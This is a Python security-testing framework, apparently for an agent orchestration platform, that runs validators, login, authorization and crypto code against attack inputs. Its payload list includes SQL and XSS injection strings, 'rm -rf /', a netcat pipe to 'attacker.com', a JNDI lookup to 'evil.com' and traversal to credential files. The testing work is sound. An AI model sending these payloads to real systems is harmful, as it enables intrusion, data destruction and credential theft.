"""
Security Testing Framework for Agent Orchestration Platform.
This module provides comprehensive security testing capabilities including:
- Input validation testing with malicious patterns
- Authentication and authorization bypass attempts
- Privilege escalation testing
- Resource exhaustion and DoS resistance
- Cryptographic security validation
- Audit trail integrity verification
- Inter-agent isolation testing
Integrates with ADDER+ security contracts and defensive programming principles.
Author: Adder_1 | Created: 2025-06-26 | Testing Infrastructure Task
"""
import pytest
import asyncio
import time
import hashlib
import secrets
from typing import Any, List, Dict, Callable, Optional, Union
from unittest.mock import AsyncMock, MagicMock
from hypothesis import given, strategies as st, assume, settings, HealthCheck
from dataclasses import dataclass
import logging
# Import our testing strategies
from tests.strategies.hypothesis_strategies import (
malicious_input_strategy, sql_injection_strategy, xss_injection_strategy,
command_injection_strategy, malicious_path_strategy, agent_name_strategy,
invalid_agent_name_strategy, security_test_scenario_strategy
)
# ============================================================================
# Security Test Configuration and Exceptions
# ============================================================================
@dataclass
class SecurityTestConfig:
"""Configuration for security testing parameters."""
max_test_time_seconds: int = 30
max_input_length: int = 10000
fuzz_iterations: int = 100
enable_destructive_tests: bool = False
log_failed_attempts: bool = True
strict_validation: bool = True
class SecurityTestFailure(Exception):
"""Raised when a security test detects a vulnerability."""
pass
class SecurityBoundaryViolation(Exception):
"""Raised when security boundaries are violated."""
pass
class AuthenticationBypassAttempt(Exception):
"""Raised when authentication bypass is attempted."""
pass
class PrivilegeEscalationAttempt(Exception):
"""Raised when privilege escalation is attempted."""
pass
# ============================================================================
# Core Security Testing Framework
# ============================================================================
class SecurityTestFramework:
"""
Comprehensive security testing framework with property-based testing.
Provides methods for testing all major security boundaries and attack vectors
while integrating with ADDER+ defensive programming principles.
"""
def __init__(self, config: SecurityTestConfig = None):
self.config = config or SecurityTestConfig()
self.logger = logging.getLogger(__name__)
self.test_results = []
async def test_input_validation_security(
self,
validator_function: Callable[[str], bool],
input_type: str = "generic"
) -> Dict[str, Any]:
"""
Test input validation against malicious input patterns.
Args:
validator_function: Function to test for input validation
input_type: Type of input being tested (for logging)
Returns:
Dictionary with test results and detected vulnerabilities
"""
vulnerabilities = []
test_count = 0
malicious_patterns = [
# SQL Injection patterns
"'; DROP TABLE agents; --",
"' OR '1'='1",
"'; DELETE FROM sessions; --",
"admin'--",
# XSS patterns
"<script>alert('xss')</script>",
"<img src=x onerror=alert('xss')>",
"javascript:alert('xss')",
"<svg onload=alert('xss')>",
# Command injection patterns
"$(rm -rf /)",
"; cat /etc/passwd",
"| nc attacker.com 4444",
"`whoami`",
# Path traversal patterns
"../../../etc/passwd",
"..\\..\\..\\windows\\system32\\config\\sam",
"/dev/null",
"/proc/self/environ",
# Template injection patterns
"{{7*7}}",
"${jndi:ldap://evil.com/a}",
"#{7*7}",
# Binary and encoding attacks
"\\x00\\x00\\x00\\x00",
"\\xff\\xfe\\xfd",
"%00%00%00%00",
# Overflow attempts
"A" * 1000,
"A" * 10000,
# Special characters and encodings
"\\r\\n\\r\\nHTTP/1.1 200 OK\\r\\n",
"file:///etc/passwd",
"data:text/html,<script>alert('xss')</script>",
]
for malicious_input in malicious_patterns:
test_count += 1
try:
# Test the validator with malicious input
is_valid = await self._safe_call(validator_function, malicious_input)
if is_valid:
# Malicious input was accepted - potential vulnerability
vulnerability = {
"type": "input_validation_bypass",
"input": malicious_input[:100], # Limit logging for safety
"attack_vector": self._classify_attack_vector(malicious_input),
"severity": "HIGH",
"description": f"Malicious {input_type} input was accepted by validator"
}
vulnerabilities.append(vulnerability)
if self.config.log_failed_attempts:
self.logger.warning(f"Security vulnerability detected: {vulnerability}")
except (ValueError, TypeError, SecurityBoundaryViolation) as e:
# Expected security exceptions - good!
pass
except Exception as e:
# Unexpected exceptions might indicate vulnerabilities
vulnerability = {
"type": "unexpected_exception",
"input": malicious_input[:100],
"exception": str(e),
"severity": "MEDIUM",
"description": f"Unexpected exception during validation: {type(e).__name__}"
}
vulnerabilities.append(vulnerability)
return {
"input_type": input_type,
"tests_run": test_count,
"vulnerabilities_found": len(vulnerabilities),
"vulnerabilities": vulnerabilities,
"status": "PASS" if len(vulnerabilities) == 0 else "FAIL"
}
@given(malicious_input=malicious_input_strategy())
@settings(max_examples=50, deadline=30000, suppress_health_check=[HealthCheck.too_slow])
async def test_boundary_enforcement_property(
self,
boundary_function: Callable[[Any], bool],
malicious_input: str
):
"""
Property-based test for security boundary enforcement.
Property: No malicious input should bypass security boundaries.
"""
assume(len(malicious_input) <= self.config.max_input_length)
try:
# Test the boundary function
result = await self._safe_call(boundary_function, malicious_input)
# Malicious inputs should be rejected
if result is True:
raise SecurityTestFailure(
f"Security boundary bypassed by malicious input: {malicious_input[:50]}..."
)
except (SecurityBoundaryViolation, ValueError, TypeError):
# Expected security exceptions are good
pass
except SecurityTestFailure:
# Re-raise our security test failures
raise
except Exception as e:
# Log unexpected exceptions for investigation
self.logger.error(f"Unexpected exception in boundary test: {type(e).__name__}: {e}")
raise SecurityTestFailure(f"Unexpected exception: {type(e).__name__}")
async def test_authentication_bypass_resistance(
self,
auth_function: Callable[[str, str], bool],
username: str = "testuser"
) -> Dict[str, Any]:
"""
Test resistance to authentication bypass attempts.
Args:
auth_function: Authentication function to test
username: Valid username for testing
Returns:
Dictionary with test results
"""
bypass_attempts = [
# SQL injection bypass attempts
("admin'--", "password"),
("admin' OR '1'='1", "password"),
("admin'; --", "anything"),
# Password bypass attempts
(username, "' OR '1'='1"),
(username, "admin'--"),
(username, "password' OR '1'='1' --"),
# Empty/null authentication
("", ""),
(None, None),
("admin", ""),
("", "password"),
# Long input attacks
("A" * 1000, "password"),
(username, "A" * 1000),
# Special characters
("admin\\x00", "password"),
(username, "password\\x00"),
("admin\\r\\n", "password"),
]
vulnerabilities = []
for test_username, test_password in bypass_attempts:
try:
authenticated = await self._safe_call(
auth_function, test_username, test_password
)
if authenticated:
vulnerability = {
"type": "authentication_bypass",
"username": str(test_username)[:50],
"password": "[REDACTED]",
"severity": "CRITICAL",
"description": "Authentication bypassed with malicious credentials"
}
vulnerabilities.append(vulnerability)
except (AuthenticationBypassAttempt, ValueError, TypeError):
# Expected authentication failures - good!
pass
except Exception as e:
self.logger.error(f"Unexpected auth error: {e}")
return {
"test_type": "authentication_bypass",
"attempts_tested": len(bypass_attempts),
"vulnerabilities_found": len(vulnerabilities),
"vulnerabilities": vulnerabilities,
"status": "PASS" if len(vulnerabilities) == 0 else "FAIL"
}
async def test_privilege_escalation_resistance(
self,
privileged_operation: Callable[..., Any],
unprivileged_context: Dict[str, Any]
) -> Dict[str, Any]:
"""
Test resistance to privilege escalation attempts.
Args:
privileged_operation: Function that requires elevated privileges
unprivileged_context: Context without required privileges
Returns:
Dictionary with test results
"""
escalation_attempts = [
# Parameter injection attempts
{**unprivileged_context, "admin": True},
{**unprivileged_context, "sudo": True},
{**unprivileged_context, "root": True},
{**unprivileged_context, "privilege_level": "admin"},
{**unprivileged_context, "is_admin": True},
# Token manipulation attempts
{**unprivileged_context, "auth_token": "admin_token"},
{**unprivileged_context, "session_id": "admin_session"},
{**unprivileged_context, "user_id": "0"}, # Root user ID
# Role manipulation attempts
{**unprivileged_context, "role": "administrator"},
{**unprivileged_context, "permissions": ["*"]},
{**unprivileged_context, "groups": ["admin", "sudo"]},
]
vulnerabilities = []
for escalation_attempt in escalation_attempts:
try:
result = await self._safe_call(
privileged_operation, **escalation_attempt
)
# If operation succeeded, check if result indicates privilege escalation
if self._indicates_privilege_escalation(result):
vulnerability = {
"type": "privilege_escalation",
"attempt": str(escalation_attempt)[:200],
"result": str(result)[:200],
"severity": "CRITICAL",
"description": "Privilege escalation successful"
}
vulnerabilities.append(vulnerability)
except (PrivilegeEscalationAttempt, PermissionError, ValueError):
# Expected privilege errors - good!
pass
except Exception as e:
self.logger.error(f"Unexpected privilege escalation error: {e}")
return {
"test_type": "privilege_escalation",
"attempts_tested": len(escalation_attempts),
"vulnerabilities_found": len(vulnerabilities),
"vulnerabilities": vulnerabilities,
"status": "PASS" if len(vulnerabilities) == 0 else "FAIL"
}
async def test_resource_exhaustion_resistance(
self,
resource_operation: Callable[..., Any],
resource_params: Dict[str, Any]
) -> Dict[str, Any]:
"""
Test resistance to resource exhaustion attacks.
Args:
resource_operation: Function that consumes resources
resource_params: Parameters for the operation
Returns:
Dictionary with test results
"""
vulnerabilities = []
# Test various resource exhaustion scenarios
exhaustion_tests = [
# Memory exhaustion
{**resource_params, "size": 1024 * 1024 * 100}, # 100MB
{**resource_params, "count": 10000}, # Large count
{**resource_params, "iterations": 100000}, # Many iterations
# Time-based attacks
{**resource_params, "timeout": 3600}, # 1 hour timeout
{**resource_params, "delay": 1000}, # Very long delay
# Recursive attacks
{**resource_params, "depth": 10000}, # Deep recursion
{**resource_params, "nested_levels": 1000}, # Deep nesting
]
for test_params in exhaustion_tests:
start_time = time.time()
try:
# Set a reasonable timeout for the test
result = await asyncio.wait_for(
self._safe_call(resource_operation, **test_params),
timeout=self.config.max_test_time_seconds
)
elapsed = time.time() - start_time
# Check if operation took too long or used excessive resources
if elapsed > 10.0: # More than 10 seconds
vulnerability = {
"type": "resource_exhaustion",
"test_params": str(test_params)[:200],
"elapsed_time": elapsed,
"severity": "HIGH",
"description": f"Operation took {elapsed:.2f} seconds"
}
vulnerabilities.append(vulnerability)
# Check for memory usage if available
if hasattr(result, 'memory_usage') and result.memory_usage > 100 * 1024 * 1024: # 100MB
vulnerability = {
"type": "memory_exhaustion",
"memory_used": result.memory_usage,
"severity": "HIGH",
"description": f"Excessive memory usage: {result.memory_usage} bytes"
}
vulnerabilities.append(vulnerability)
except asyncio.TimeoutError:
# Timeout is expected for resource exhaustion attempts
pass
except (MemoryError, OSError):
# Expected resource limit exceptions
pass
except Exception as e:
self.logger.error(f"Unexpected resource exhaustion error: {e}")
return {
"test_type": "resource_exhaustion",
"tests_run": len(exhaustion_tests),
"vulnerabilities_found": len(vulnerabilities),
"vulnerabilities": vulnerabilities,
"status": "PASS" if len(vulnerabilities) == 0 else "FAIL"
}
async def test_cryptographic_security(
self,
encryption_function: Callable[[bytes, bytes], bytes],
decryption_function: Callable[[bytes, bytes], bytes],
key_generation_function: Callable[[], bytes]
) -> Dict[str, Any]:
"""
Test cryptographic security implementation.
Args:
encryption_function: Function to encrypt data
decryption_function: Function to decrypt data
key_generation_function: Function to generate keys
Returns:
Dictionary with test results
"""
vulnerabilities = []
# Test weak key generation
keys = []
for _ in range(10):
key = key_generation_function()
if key in keys:
vulnerability = {
"type": "weak_key_generation",
"severity": "CRITICAL",
"description": "Key generation produced duplicate keys"
}
vulnerabilities.append(vulnerability)
keys.append(key)
# Test key strength
for key in keys[:3]: # Test first 3 keys
if len(key) < 32: # Less than 256 bits
vulnerability = {
"type": "insufficient_key_length",
"key_length": len(key),
"severity": "HIGH",
"description": f"Key length {len(key)} bytes is insufficient"
}
vulnerabilities.append(vulnerability)
# Test encryption/decryption with malicious data
test_key = keys[0] if keys else b"test_key_32_bytes_long_for_test"
malicious_data = [
b"\\x00" * 1000, # Null bytes
b"\\xff" * 1000, # All 1s
secrets.token_bytes(1024 * 1024), # Random 1MB data
b"A" * 100000, # Large repeated pattern
]
for data in malicious_data:
try:
encrypted = encryption_function(data, test_key)
decrypted = decryption_function(encrypted, test_key)
if decrypted != data:
vulnerability = {
"type": "encryption_integrity_failure",
"data_size": len(data),
"severity": "CRITICAL",
"description": "Decrypted data doesn't match original"
}
vulnerabilities.append(vulnerability)
except Exception as e:
self.logger.error(f"Cryptographic test error: {e}")
return {
"test_type": "cryptographic_security",
"keys_tested": len(keys),
"data_patterns_tested": len(malicious_data),
"vulnerabilities_found": len(vulnerabilities),
"vulnerabilities": vulnerabilities,
"status": "PASS" if len(vulnerabilities) == 0 else "FAIL"
}
# ========================================================================
# Property-Based Security Tests
# ========================================================================
@given(
attack_scenario=security_test_scenario_strategy(),
target_input=malicious_input_strategy()
)
@settings(max_examples=20, deadline=60000)
async def test_comprehensive_security_property(
self,
system_under_test: Callable[[str, Dict[str, Any]], Any],
attack_scenario: Dict[str, Any],
target_input: str
):
"""
Comprehensive property-based security test.
Property: System should resist all attack vectors regardless of input.
"""
assume(len(target_input) <= self.config.max_input_length)
try:
result = await self._safe_call(
system_under_test, target_input, attack_scenario
)
# Analyze result for security violations
if self._contains_security_violation(result, target_input, attack_scenario):
raise SecurityTestFailure(
f"Security violation detected with scenario: {attack_scenario['attack_vectors']}"
)
except (SecurityBoundaryViolation, ValueError, TypeError):
# Expected security exceptions
pass
except SecurityTestFailure:
raise
except Exception as e:
self.logger.error(f"Unexpected security test error: {e}")
raise SecurityTestFailure(f"Unexpected exception: {type(e).__name__}")
# ========================================================================
# Helper Methods
# ========================================================================
async def _safe_call(self, func: Callable, *args, **kwargs) -> Any:
"""Safely call a function with timeout protection."""
try:
if asyncio.iscoroutinefunction(func):
return await asyncio.wait_for(
func(*args, **kwargs),
timeout=self.config.max_test_time_seconds
)
else:
return func(*args, **kwargs)
except asyncio.TimeoutError:
raise SecurityTestFailure("Function call timed out")
def _classify_attack_vector(self, malicious_input: str) -> str:
"""Classify the type of attack vector based on input pattern."""
if "DROP TABLE" in malicious_input.upper() or "' OR '" in malicious_input:
return "sql_injection"
elif "<script>" in malicious_input.lower() or "javascript:" in malicious_input.lower():
return "xss"
elif "$(" in malicious_input or "`" in malicious_input:
return "command_injection"
elif "../" in malicious_input or "..\\\" in malicious_input:
return "path_traversal"
elif "{{" in malicious_input or "${" in malicious_input:
return "template_injection"
elif "\\x00" in malicious_input:
return "null_byte_injection"
else:
return "unknown"
def _indicates_privilege_escalation(self, result: Any) -> bool:
"""Check if result indicates successful privilege escalation."""
if isinstance(result, dict):
dangerous_keys = ["admin", "root", "sudo", "elevated", "privileged"]
return any(key in result and result[key] for key in dangerous_keys)
elif isinstance(result, str):
dangerous_phrases = ["admin access", "root access", "privilege granted"]
return any(phrase in result.lower() for phrase in dangerous_phrases)
return False
def _contains_security_violation(
self,
result: Any,
input_data: str,
scenario: Dict[str, Any]
) -> bool:
"""Check if result contains security violations."""
if result is None:
return False
# Check for echoed malicious input (potential XSS)
if isinstance(result, str) and input_data in result:
return True
# Check for privilege escalation indicators
if self._indicates_privilege_escalation(result):
return True
# Check for data exposure
if isinstance(result, dict):
sensitive_keys = ["password", "token", "secret", "key", "credential"]
if any(key in result for key in sensitive_keys):
return True
return False
# ============================================================================
# Security Test Decorators and Utilities
# ============================================================================
def security_test(
attack_vectors: List[str] = None,
max_examples: int = 50,
timeout_seconds: int = 30
):
"""
Decorator for marking security tests with specific attack vectors.
Args:
attack_vectors: List of attack vectors to test
max_examples: Maximum examples for property-based tests
timeout_seconds: Timeout for individual tests
"""
def decorator(test_func):
test_func._security_test = True
test_func._attack_vectors = attack_vectors or []
test_func._max_examples = max_examples
test_func._timeout_seconds = timeout_seconds
return test_func
return decorator
def requires_security_config(config_key: str, default_value: Any = None):
"""Decorator to require specific security configuration."""
def decorator(test_func):
test_func._requires_config = config_key
test_func._config_default = default_value
return test_func
return decorator
class SecurityTestSuite:
"""Collection of ready-to-use security tests for common components."""
@staticmethod
@security_test(attack_vectors=["input_validation"])
async def test_agent_name_validation_security(validator_func):
"""Test agent name validation against malicious inputs."""
framework = SecurityTestFramework()
return await framework.test_input_validation_security(
validator_func, "agent_name"
)
@staticmethod
@security_test(attack_vectors=["authentication_bypass"])
async def test_authentication_security(auth_func):
"""Test authentication mechanism security."""
framework = SecurityTestFramework()
return await framework.test_authentication_bypass_resistance(auth_func)
@staticmethod
@security_test(attack_vectors=["privilege_escalation"])
async def test_authorization_security(privileged_func, context):
"""Test authorization mechanism security."""
framework = SecurityTestFramework()
return await framework.test_privilege_escalation_resistance(
privileged_func, context
)
# Export main components
__all__ = [
'SecurityTestFramework', 'SecurityTestConfig', 'SecurityTestFailure',
'SecurityBoundaryViolation', 'SecurityTestSuite', 'security_test',
'requires_security_config'
]